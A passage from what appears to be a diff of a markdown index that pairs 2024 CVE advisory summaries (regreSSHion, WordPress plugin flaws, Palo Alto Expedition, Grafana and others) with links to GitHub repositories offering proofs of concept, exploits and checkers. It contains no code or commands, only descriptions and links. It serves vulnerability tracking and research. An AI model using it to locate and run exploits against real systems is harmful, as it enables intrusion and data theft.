[imv7/CVE-2024-6387](https://github.com/imv7/CVE-2024-6387) +- [SiberianHacker/CVE-2024-6387-Finder](https://github.com/SiberianHacker/CVE-2024-6387-Finder) +- [dgicloud/patch_regreSSHion](https://github.com/dgicloud/patch_regreSSHion) +- [azurejoga/CVE-2024-6387-how-to-fix](https://github.com/azurejoga/CVE-2024-6387-how-to-fix) +- [asterictnl-lvdw/CVE-2024-6387](https://github.com/asterictnl-lvdw/CVE-2024-6387) +- [vkaushik-chef/regreSSHion](https://github.com/vkaushik-chef/regreSSHion) +- [dgourillon/mitigate-CVE-2024-6387](https://github.com/dgourillon/mitigate-CVE-2024-6387) +- [mrmtwoj/CVE-2024-6387](https://github.com/mrmtwoj/CVE-2024-6387) +- [filipi86/CVE-2024-6387-Vulnerability-Checker](https://github.com/filipi86/CVE-2024-6387-Vulnerability-Checker) +- [kubota/CVE-2024-6387-Vulnerability-Checker](https://github.com/kubota/CVE-2024-6387-Vulnerability-Checker) +- [DimaMend/cve-2024-6387-poc](https://github.com/DimaMend/cve-2024-6387-poc) +- [ThemeHackers/CVE-2024-6387](https://github.com/ThemeHackers/CVE-2024-6387) +- [Sibijo/mitigate_ssh](https://github.com/Sibijo/mitigate_ssh) +- [Passyed/regreSSHion-Fix](https://github.com/Passyed/regreSSHion-Fix) +- [dream434/CVE-2024-6387](https://github.com/dream434/CVE-2024-6387) +- [ThatNotEasy/CVE-2024-6387](https://github.com/ThatNotEasy/CVE-2024-6387) +- [prelearn-code/CVE-2024-6387](https://github.com/prelearn-code/CVE-2024-6387) +- [l-urk/CVE-2024-6387](https://github.com/l-urk/CVE-2024-6387) +- [alex14324/ssh_poc2024](https://github.com/alex14324/ssh_poc2024) +- [X-Projetion/CVE-2023-4596-OpenSSH-Multi-Checker](https://github.com/X-Projetion/CVE-2023-4596-OpenSSH-Multi-Checker) +- [s1d6point7bugcrowd/CVE-2024-6387-Race-Condition-in-Signal-Handling-for-OpenSSH](https://github.com/s1d6point7bugcrowd/CVE-2024-6387-Race-Condition-in-Signal-Handling-for-OpenSSH) +- [almogopp/OpenSSH-CVE-2024-6387-Fix](https://github.com/almogopp/OpenSSH-CVE-2024-6387-Fix) +- [HadesNull123/CVE-2024-6387_Check](https://github.com/HadesNull123/CVE-2024-6387_Check) +- [identity-threat-labs/CVE-2024-6387-Vulnerability-Checker](https://github.com/identity-threat-labs/CVE-2024-6387-Vulnerability-Checker) +- [identity-threat-labs/Article-RegreSSHion-CVE-2024-6387](https://github.com/identity-threat-labs/Article-RegreSSHion-CVE-2024-6387) +- [YassDEV221608/CVE-2024-6387](https://github.com/YassDEV221608/CVE-2024-6387) + +### CVE-2024-6473 (2024-09-03) + +Yandex Browser for Desktop before 24.7.1.380 has a DLL Hijacking Vulnerability because an untrusted search path is used. + + +- [12345qwert123456/CVE-2024-6473-PoC](https://github.com/12345qwert123456/CVE-2024-6473-PoC) + +### CVE-2024-6529 (2024-08-01) + +The Ultimate Classified Listings WordPress plugin before 1.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin + + +- [Abdurahmon3236/CVE-2024-6529](https://github.com/Abdurahmon3236/CVE-2024-6529) + +### CVE-2024-6536 (2024-07-30) + +The Zephyr Project Manager WordPress plugin before 3.3.99 does not sanitise and escape some of its settings, which could allow high privilege users such as editors and admins to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) + + +- [apena-ba/CVE-2024-6536](https://github.com/apena-ba/CVE-2024-6536) + +### CVE-2024-6592 (2024-09-25) + +Incorrect Authorization vulnerability in the protocol communication between the WatchGuard Authentication Gateway (aka Single Sign-On Agent) on Windows and the WatchGuard Single Sign-On Client on Windows and MacOS allows Authentication Bypass.This issue affects the Authentication Gateway: through 12.10.2; Windows Single Sign-On Client: through 12.7; MacOS Single Sign-On Client: through 12.5.4. + + +- [RedTeamPentesting/watchguard-sso-client](https://github.com/RedTeamPentesting/watchguard-sso-client) + +### CVE-2024-6624 (2024-07-11) + +The JSON API User plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 3.9.3. This is due to improper controls on custom user meta fields. This makes it possible for unauthenticated attackers to register as administrators on the site. The plugin requires the JSON API plugin to also be installed. + + +- [RandomRobbieBF/CVE-2024-6624](https://github.com/RandomRobbieBF/CVE-2024-6624) + +### CVE-2024-6670 (2024-08-29) + +In WhatsUp Gold versions released before 2024.0.0, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the users encrypted password. + + +- [sinsinology/CVE-2024-6670](https://github.com/sinsinology/CVE-2024-6670) + +### CVE-2024-6768 (2024-08-12) + +A Denial of Service in CLFS.sys in Microsoft Windows 10, Windows 11, Windows Server 2016, Windows Server 2019, and Windows Server 2022 allows a malicious authenticated low-privilege user to cause a Blue Screen of Death via a forced call to the KeBugCheckEx function. + + +- [fortra/CVE-2024-6768](https://github.com/fortra/CVE-2024-6768) + +### CVE-2024-6769 (2024-09-26) + +A DLL Hijacking caused by drive remapping combined with a poisoning of the activation cache in Microsoft Windows 10, Windows 11, Windows Server 2016, Windows Server 2019, and Windows Server 2022 allows a malicious authenticated attacker to elevate from a medium integrity process to a high integrity process without the intervention of a UAC prompt. + + +- [fortra/CVE-2024-6769](https://github.com/fortra/CVE-2024-6769) + +### CVE-2024-6778 (2024-07-16) + +Race in DevTools in Google Chrome prior to 126.0.6478.182 allowed an attacker who convinced a user to install a malicious extension to inject scripts or HTML into a privileged page via a crafted Chrome Extension. (Chromium security severity: High) + + +- [ading2210/CVE-2024-6778-POC](https://github.com/ading2210/CVE-2024-6778-POC) +- [r00tjunip3r1/POC-CVE-2024-6778](https://github.com/r00tjunip3r1/POC-CVE-2024-6778) + +### CVE-2024-6782 (2024-08-06) + +Improper access control in Calibre 6.9.0 ~ 7.14.0 allow unauthenticated attackers to achieve remote code execution. + + +- [zangjiahe/CVE-2024-6782](https://github.com/zangjiahe/CVE-2024-6782) +- [jdpsl/CVE-2024-6782](https://github.com/jdpsl/CVE-2024-6782) +- [0xB0y426/CVE-2024-6782-PoC](https://github.com/0xB0y426/CVE-2024-6782-PoC) + +### CVE-2024-7029 (2024-08-02) + +Commands can be injected over the network and executed without authentication. + + +- [bigherocenter/CVE-2024-7029-EXPLOIT](https://github.com/bigherocenter/CVE-2024-7029-EXPLOIT) +- [ebrasha/CVE-2024-7029](https://github.com/ebrasha/CVE-2024-7029) +- [geniuszlyy/CVE-2024-7029](https://github.com/geniuszlyy/CVE-2024-7029) + +### CVE-2024-7094 (2024-08-13) + +The JS Help Desk – The Ultimate Help Desk & Support Plugin plugin for WordPress is vulnerable to PHP Code Injection leading to Remote Code Execution in all versions up to, and including, 2.8.6 via the 'storeTheme' function. This is due to a lack of sanitization on user-supplied values, which replace values in the style.php file, along with missing capability checks. This makes it possible for unauthenticated attackers to execute code on the server. This issue was partially patched in 2.8.6 when the code injection issue was resolved, and fully patched in 2.8.7 when the missing authorization and cross-site request forgery protection was added. + + +- [nastar-id/CVE-2024-7094](https://github.com/nastar-id/CVE-2024-7094) + +### CVE-2024-7120 (2024-07-26) + +Es wurde eine kritische Schwachstelle in Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90 gefunden. Hiervon betroffen ist ein unbekannter Codeblock der Datei list_base_config.php der Komponente Web Interface. Durch die Manipulation des Arguments template mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. Der Exploit steht zur öffentlichen Verfügung. + + +- [gh-ost00/CVE-2024-7120](https://github.com/gh-ost00/CVE-2024-7120) + +### CVE-2024-7124 (2024-11-14) + +Improper Neutralization of Input During Web Page Generation vulnerability in DInGO dLibra software in the parameter 'filter' in the endpoint 'indexsearch' allows a Reflected Cross-Site Scripting (XSS). An attacker might trick somebody into using a crafted URL, which will cause a script to be run in user's browser. This issue affects DInGO dLibra software in versions from 6.0 before 6.3.20. + + +- [kac89/CVE-2024-7124](https://github.com/kac89/CVE-2024-7124) + +### CVE-2024-7135 (2024-07-31) + +The Tainacan plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_file' function in all versions up to, and including, 0.21.7. The function is also vulnerable to directory traversal. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. + + +- [RandomRobbieBF/CVE-2024-7135](https://github.com/RandomRobbieBF/CVE-2024-7135) + +### CVE-2024-7313 (2024-08-26) + +The Shield Security WordPress plugin before 20.0.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. + + +- [Wayne-Ker/CVE-2024-7313](https://github.com/Wayne-Ker/CVE-2024-7313) + +### CVE-2024-7339 (2024-08-01) + +In TVT DVR TD-2104TS-CL, DVR TD-2108TS-HP, Provision-ISR DVR SH-4050A5-5L(MM) and AVISION DVR AV108T wurde eine problematische Schwachstelle gefunden. Betroffen ist eine unbekannte Verarbeitung der Datei /queryDevInfo. Dank der Manipulation mit unbekannten Daten kann eine information disclosure-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. + + +- [RevoltSecurities/CVE-2024-7339](https://github.com/RevoltSecurities/CVE-2024-7339) + +### CVE-2024-7456 (2024-11-01) + +A SQL injection vulnerability exists in the `/api/v1/external-users` route of lunary-ai/lunary version v1.4.2. The `order by` clause of the SQL query uses `sql.unsafe` without prior sanitization, allowing for SQL injection. The `orderByClause` variable is constructed without server-side validation or sanitization, enabling an attacker to execute arbitrary SQL commands. Successful exploitation can lead to complete data loss, modification, or corruption. + + +- [77Philly/CVE-2024-7456scripts](https://github.com/77Philly/CVE-2024-7456scripts) + +### CVE-2024-7479 (2024-09-25) + +Improper verification of cryptographic signature during installation of a VPN driver via the TeamViewer_service.exe component of TeamViewer Remote Clients prior version 15.58.4 for Windows allows an attacker with local unprivileged access on a Windows system to elevate their privileges and install drivers. + + +- [PeterGabaldon/CVE-2024-7479_CVE-2024-7481](https://github.com/PeterGabaldon/CVE-2024-7479_CVE-2024-7481) + +### CVE-2024-7514 (2024-10-11) + +The WordPress Comments Import & Export plugin for WordPress is vulnerable to to arbitrary file read due to insufficient file path validation during the comments import process, in versions up to, and including, 2.3.7. This makes it possible for authenticated attackers, with Author-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.\r\nThe issue was partially fixed in version 2.3.8 and fully fixed in 2.3.9 + + +- [RandomRobbieBF/CVE-2024-7514](https://github.com/RandomRobbieBF/CVE-2024-7514) + +### CVE-2024-7593 (2024-08-13) + +Incorrect implementation of an authentication algorithm in Ivanti vTM other than versions 22.2R1 or 22.7R2 allows a remote unauthenticated attacker to bypass authentication of the admin panel. + + +- [rxerium/CVE-2024-7593](https://github.com/rxerium/CVE-2024-7593) +- [D3N14LD15K/CVE-2024-7593_PoC_Exploit](https://github.com/D3N14LD15K/CVE-2024-7593_PoC_Exploit) +- [skyrowalker/CVE-2024-7593](https://github.com/skyrowalker/CVE-2024-7593) + +### CVE-2024-7646 (2024-08-16) + +A security issue was discovered in ingress-nginx where an actor with permission to create Ingress objects (in the `networking.k8s.io` or `extensions` API group) can bypass annotation validation to inject arbitrary commands and obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster. + + +- [r0binak/CVE-2024-7646](https://github.com/r0binak/CVE-2024-7646) +- [dovics/cve-2024-7646](https://github.com/dovics/cve-2024-7646) + +### CVE-2024-7703 (2024-08-17) + +The ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 4.0.37 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + + +- [lfillaz/CVE-2024-7703](https://github.com/lfillaz/CVE-2024-7703) + +### CVE-2024-7808 (2024-08-15) + +Es wurde eine kritische Schwachstelle in code-projects Job Portal 1.0 ausgemacht. Betroffen hiervon ist ein unbekannter Ablauf der Datei logindbc.php. Dank Manipulation des Arguments email mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. + + +- [TheUnknownSoul/CVE-2024-7808](https://github.com/TheUnknownSoul/CVE-2024-7808) + +### CVE-2024-7854 (2024-08-21) + +The Woo Inquiry plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 0.1 due to insufficient escaping on the user supplied parameter 'dbid' and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [RandomRobbieBF/CVE-2024-7854](https://github.com/RandomRobbieBF/CVE-2024-7854) + +### CVE-2024-7856 (2024-08-29) + +The MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar plugin for WordPress is vulnerable to unauthorized arbitrary file deletion due to a missing capability check on the removeTempFiles() function and insufficient path validation on the 'file' parameter in all versions up to, and including, 5.7.0.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary files which can make remote code execution possible when wp-config.php is deleted. + + +- [l8BL/CVE-2024-7856](https://github.com/l8BL/CVE-2024-7856) + +### CVE-2024-7928 (2024-08-19) + +Eine problematische Schwachstelle wurde in FastAdmin bis 1.3.3.20220121 entdeckt. Hierbei geht es um eine nicht exakt ausgemachte Funktion der Datei /index/ajax/lang. Durch Manipulation des Arguments lang mit unbekannten Daten kann eine path traversal-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 1.3.4.20220530 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. + + +- [bigb0x/CVE-2024-7928](https://github.com/bigb0x/CVE-2024-7928) +- [gh-ost00/CVE-2024-7928](https://github.com/gh-ost00/CVE-2024-7928) +- [wh6amiGit/CVE-2024-7928](https://github.com/wh6amiGit/CVE-2024-7928) +- [th3gokul/CVE-2024-7928](https://github.com/th3gokul/CVE-2024-7928) + +### CVE-2024-7954 (2024-08-23) + +The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary code execution vulnerability. A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request. + + +- [Chocapikk/CVE-2024-7954](https://github.com/Chocapikk/CVE-2024-7954) +- [bigb0x/CVE-2024-7954](https://github.com/bigb0x/CVE-2024-7954) +- [gh-ost00/CVE-2024-7954-RCE](https://github.com/gh-ost00/CVE-2024-7954-RCE) +- [TheCyberguy-17/RCE_CVE-2024-7954](https://github.com/TheCyberguy-17/RCE_CVE-2024-7954) +- [MuhammadWaseem29/RCE-CVE-2024-7954](https://github.com/MuhammadWaseem29/RCE-CVE-2024-7954) +- [issamjr/CVE-2024-7954](https://github.com/issamjr/CVE-2024-7954) + +### CVE-2024-7965 (2024-08-21) + +Inappropriate implementation in V8 in Google Chrome prior to 128.0.6613.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) + + +- [bi-zone/CVE-2024-7965](https://github.com/bi-zone/CVE-2024-7965) +- [XiaomingX/cve-2024-7965-poc](https://github.com/XiaomingX/cve-2024-7965-poc) + +### CVE-2024-8069 (2024-11-12) + +Limited remote code execution with privilege of a NetworkService Account access in Citrix Session Recording if the attacker is an authenticated user on the same intranet as the session recording server + + +- [XiaomingX/cve-2024-8069-exp-Citrix-Virtual-Apps-XEN](https://github.com/XiaomingX/cve-2024-8069-exp-Citrix-Virtual-Apps-XEN) + +### CVE-2024-8190 (2024-09-10) + +An OS command injection vulnerability in Ivanti Cloud Services Appliance versions 4.6 Patch 518 and before allows a remote authenticated attacker to obtain remote code execution. The attacker must have admin level privileges to exploit this vulnerability. + + +- [horizon3ai/CVE-2024-8190](https://github.com/horizon3ai/CVE-2024-8190) + +### CVE-2024-8275 (2024-09-25) + +The The Events Calendar plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the 'tribe_has_next_event' function in all versions up to, and including, 6.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Only sites that have manually added tribe_has_next_event() will be vulnerable to this SQL injection. + + +- [p33d/CVE-2024-8275](https://github.com/p33d/CVE-2024-8275) +- [whiterose7777/CVE-2024-8275](https://github.com/whiterose7777/CVE-2024-8275) + +### CVE-2024-8277 (2024-09-11) + +The WooCommerce Photo Reviews Premium plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.3.13.2. This is due to the plugin not properly validating what user transient is being used in the login() function and not properly verifying the user's identity. This makes it possible for unauthenticated attackers to log in as user that has dismissed an admin notice in the past 30 days, which is often an administrator. Alternatively, a user can log in as any user with any transient that has a valid user_id as the value, though it would be more difficult to exploit this successfully. + + +- [PolatBey/CVE-2024-8277](https://github.com/PolatBey/CVE-2024-8277) + +### CVE-2024-8309 (2024-10-29) + +A vulnerability in the GraphCypherQAChain class of langchain-ai/langchain version 0.2.5 allows for SQL injection through prompt injection. This vulnerability can lead to unauthorized data manipulation, data exfiltration, denial of service (DoS) by deleting all data, breaches in multi-tenant security environments, and data integrity issues. Attackers can create, update, or delete nodes and relationships without proper authorization, extract sensitive data, disrupt services, access data across different tenants, and compromise the integrity of the database. + + +- [liadlevy/CVE-2024-8309](https://github.com/liadlevy/CVE-2024-8309) + +### CVE-2024-8349 (2024-09-25) + +The Uncanny Groups for LearnDash plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 6.1.0.1. This is due to the plugin not properly restricting what users a group leader can edit. This makes it possible for authenticated attackers, with group leader-level access and above, to change admin account email addresses which can subsequently lead to admin account access. + + +- [karlemilnikka/CVE-2024-8349-and-CVE-2024-8350](https://github.com/karlemilnikka/CVE-2024-8349-and-CVE-2024-8350) + +### CVE-2024-8353 (2024-09-28) + +The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.16.1 via deserialization of untrusted input via several parameters like 'give_title' and 'card_address'. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to delete arbitrary files and achieve remote code execution. This is essentially the same vulnerability as CVE-2024-5932, however, it was discovered the the presence of stripslashes_deep on user_info allows the is_serialized check to be bypassed. This issue was mostly patched in 3.16.1, but further hardening was added in 3.16.2. + + +- [EQSTLab/CVE-2024-8353](https://github.com/EQSTLab/CVE-2024-8353) + +### CVE-2024-8484 (2024-09-25) + +The REST API TO MiniProgram plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the /wp-json/watch-life-net/v1/comment/getcomments REST API endpoint in all versions up to, and including, 4.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [RandomRobbieBF/CVE-2024-8484](https://github.com/RandomRobbieBF/CVE-2024-8484) + +### CVE-2024-8504 (2024-09-10) + +An attacker with authenticated access to VICIdial as an "agent" can execute arbitrary shell commands as the "root" user. This attack can be chained with CVE-2024-8503 to execute arbitrary shell commands starting from an unauthenticated perspective. + + +- [Chocapikk/CVE-2024-8504](https://github.com/Chocapikk/CVE-2024-8504) +- [havokzero/ViciDial](https://github.com/havokzero/ViciDial) + +### CVE-2024-8517 (2024-09-06) + +SPIP before 4.3.2, 4.2.16, and \n4.1.18 is vulnerable to a command injection issue. A \nremote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request. + + +- [Chocapikk/CVE-2024-8517](https://github.com/Chocapikk/CVE-2024-8517) + +### CVE-2024-8522 (2024-09-12) + +The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_only_fields' parameter of the /wp-json/learnpress/v1/courses REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [Avento/CVE-2024-8522](https://github.com/Avento/CVE-2024-8522) + +### CVE-2024-8529 (2024-09-12) + +The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_fields' parameter of the /wp-json/lp/v1/courses/archive-course REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [RandomRobbieBF/CVE-2024-8529](https://github.com/RandomRobbieBF/CVE-2024-8529) + +### CVE-2024-8698 (2024-09-19) + +A flaw exists in the SAML signature validation method within the Keycloak XMLSignatureUtil class. The method incorrectly determines whether a SAML signature is for the full document or only for specific assertions based on the position of the signature in the XML document, rather than the Reference element used to specify the signed element. This flaw allows attackers to create crafted responses that can bypass the validation, potentially leading to privilege escalation or impersonation attacks. + + +- [huydoppaz/CVE-2024-8698-POC](https://github.com/huydoppaz/CVE-2024-8698-POC) + +### CVE-2024-8752 (2024-09-16) + +The Windows version of WebIQ 2.15.9 is affected by a directory traversal vulnerability that allows remote attackers to read any file on the system. + + +- [D3anSPGDMS/CVE-2024-8752](https://github.com/D3anSPGDMS/CVE-2024-8752) + +### CVE-2024-8856 (2024-11-16) + +The Backup and Staging by WP Time Capsule plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the the UploadHandler.php file and no direct file access prevention in all versions up to, and including, 1.22.21. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. + + +- [ubaii/CVE-2024-8856](https://github.com/ubaii/CVE-2024-8856) +- [Jenderal92/CVE-2024-8856](https://github.com/Jenderal92/CVE-2024-8856) + +### CVE-2024-8868 (2024-09-15) + +Eine Schwachstelle wurde in code-projects Crud Operation System 1.0 ausgemacht. Sie wurde als kritisch eingestuft. Davon betroffen ist unbekannter Code der Datei savedata.php. Durch Manipulieren des Arguments sname mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [M0onc/CVE-2024-8868](https://github.com/M0onc/CVE-2024-8868) + +### CVE-2024-8949 (2024-09-17) + +Es wurde eine Schwachstelle in SourceCodester Online Eyewear Shop 1.0 entdeckt. Sie wurde als kritisch eingestuft. Es geht dabei um eine nicht klar definierte Funktion der Datei /classes/Master.php der Komponente Cart Content Handler. Mittels Manipulieren des Arguments cart_id/id mit unbekannten Daten kann eine improper ownership management-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. + + +- [gh-ost00/CVE-2024-8949-POC](https://github.com/gh-ost00/CVE-2024-8949-POC) + +### CVE-2024-8963 (2024-09-19) + +Path Traversal in the Ivanti CSA before 4.6 Patch 519 allows a remote unauthenticated attacker to access restricted functionality. + + +- [patfire94/CVE-2024-8963](https://github.com/patfire94/CVE-2024-8963) + +### CVE-2024-9014 (2024-09-23) + +pgAdmin versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data. + + +- [EQSTLab/CVE-2024-9014](https://github.com/EQSTLab/CVE-2024-9014) + +### CVE-2024-9061 (2024-10-16) + +The The WP Popup Builder – Popup Forms and Marketing Lead Generation plugin for WordPress is vulnerable to arbitrary shortcode execution via the wp_ajax_nopriv_shortcode_Api_Add AJAX action in all versions up to, and including, 1.3.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. NOTE: This vulnerability was partially fixed in version 1.3.5 with a nonce check, which effectively prevented access to the affected function. However, version 1.3.6 incorporates the correct authorization check to prevent unauthorized access. + + +- [RandomRobbieBF/CVE-2024-9061](https://github.com/RandomRobbieBF/CVE-2024-9061) + +### CVE-2024-9106 (2024-10-01) + +The Wechat Social login plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.3.0. This is due to insufficient verification on the user being supplied during the social login. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id. This is only exploitable if the app secret is not set, so it has a default empty value. + + +- [RandomRobbieBF/CVE-2024-9106](https://github.com/RandomRobbieBF/CVE-2024-9106) + +### CVE-2024-9162 (2024-10-28) + +The All-in-One WP Migration and Backup plugin for WordPress is vulnerable to arbitrary PHP Code Injection due to missing file type validation during the export in all versions up to, and including, 7.86. This makes it possible for authenticated attackers, with Administrator-level access and above, to create an export file with the .php extension on the affected site's server, adding an arbitrary PHP code to it, which may make remote code execution possible. + + +- [d0n601/CVE-2024-9162](https://github.com/d0n601/CVE-2024-9162) + +### CVE-2024-9166 (2024-09-26) + +The device enables an unauthorized attacker to execute system commands with elevated privileges. This exploit is facilitated through the use of the 'getcommand' query within the application, allowing the attacker to gain root access. + + +- [Andrysqui/CVE-2024-9166](https://github.com/Andrysqui/CVE-2024-9166) + +### CVE-2024-9224 (2024-10-01) + +The Hello World plugin for WordPress is vulnerable to Arbitrary File Reading in all versions up to, and including, 2.1.1 via the hello_world_lyric() function. This makes it possible for authenticated attackers, with subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. + + +- [RandomRobbieBF/CVE-2024-9224](https://github.com/RandomRobbieBF/CVE-2024-9224) + +### CVE-2024-9234 (2024-10-11) + +The GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the install_and_activate_plugin_from_external() function (install-active-plugin REST API endpoint) in all versions up to, and including, 2.1.0. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins, or utilize the functionality to upload arbitrary files spoofed like plugins. + + +- [RandomRobbieBF/CVE-2024-9234](https://github.com/RandomRobbieBF/CVE-2024-9234) +- [CallMeBatosay/CVE-2024-9234](https://github.com/CallMeBatosay/CVE-2024-9234) + +### CVE-2024-9264 (2024-10-18) + +The SQL Expressions experimental feature of Grafana allows for the evaluation of `duckdb` queries containing user input. These queries are insufficiently sanitized before being passed to `duckdb`, leading to a command injection and local file inclusion vulnerability. Any user with the VIEWER or higher permission is capable of executing this attack. The `duckdb` binary must be present in Grafana's $PATH for this attack to function; by default, this binary is not installed in Grafana distributions. + + +- [nollium/CVE-2024-9264](https://github.com/nollium/CVE-2024-9264) +- [z3k0sec/File-Read-CVE-2024-9264](https://github.com/z3k0sec/File-Read-CVE-2024-9264) +- [z3k0sec/CVE-2024-9264-RCE-Exploit](https://github.com/z3k0sec/CVE-2024-9264-RCE-Exploit) +- [PunitTailor55/Grafana-CVE-2024-9264](https://github.com/PunitTailor55/Grafana-CVE-2024-9264) + +### CVE-2024-9326 (2024-09-29) + +In PHPGurukul Online Shopping Portal 2.0 wurde eine Schwachstelle entdeckt. Sie wurde als kritisch eingestuft. Es geht um eine nicht näher bekannte Funktion der Datei /shopping/admin/index.php der Komponente Admin Panel. Mit der Manipulation des Arguments username mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [ghostwirez/CVE-2024-9326-PoC](https://github.com/ghostwirez/CVE-2024-9326-PoC) + +### CVE-2024-9441 (2024-10-02) + +The Linear eMerge e3-Series through version 1.00-07 is vulnerable to an OS command injection vulnerability. A remote and unauthenticated attacker can execute arbitrary OS commands via the login_id parameter when invoking the forgot_password functionality over HTTP. + + +- [adhikara13/CVE-2024-9441](https://github.com/adhikara13/CVE-2024-9441) +- [p33d/CVE-2024-9441](https://github.com/p33d/CVE-2024-9441) +- [XiaomingX/cve-2024-9441-poc](https://github.com/XiaomingX/cve-2024-9441-poc) + +### CVE-2024-9464 (2024-10-09) + +An OS command injection vulnerability in Palo Alto Networks Expedition allows an authenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls. + + +- [horizon3ai/CVE-2024-9464](https://github.com/horizon3ai/CVE-2024-9464) + +### CVE-2024-9465 (2024-10-09) + +An SQL injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. With this, attackers can also create and read arbitrary files on the Expedition system. + + +- [horizon3ai/CVE-2024-9465](https://github.com/horizon3ai/CVE-2024-9465) +- [mustafaakalin/CVE-2024-9465](https://github.com/mustafaakalin/CVE-2024-9465) + +### CVE-2024-9466 (2024-10-09) + +A cleartext storage of sensitive information vulnerability in Palo Alto Networks Expedition allows an authenticated attacker to reveal firewall usernames, passwords, and API keys generated using those credentials. + + +- [holypryx/CVE-2024-9466](https://github.com/holypryx/CVE-2024-9466) + +### CVE-2024-9474 (2024-11-18) + +A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.\n\nCloud NGFW and Prisma Access are not impacted by this vulnerability. + + +- [Chocapikk/CVE-2024-9474](https://github.com/Chocapikk/CVE-2024-9474) +- [k4nfr3/CVE-2024-9474](https://github.com/k4nfr3/CVE-2024-9474) +- [deathvu/CVE-2024-9474](https://github.com/deathvu/CVE-2024-9474) + +### CVE-2024-9570 (2024-10-07) + +Eine Schwachstelle wurde in D-Link DIR-619L B1 2.06 gefunden. Sie wurde als kritisch eingestuft. Hierbei geht es um die Funktion formEasySetTimezone der Datei 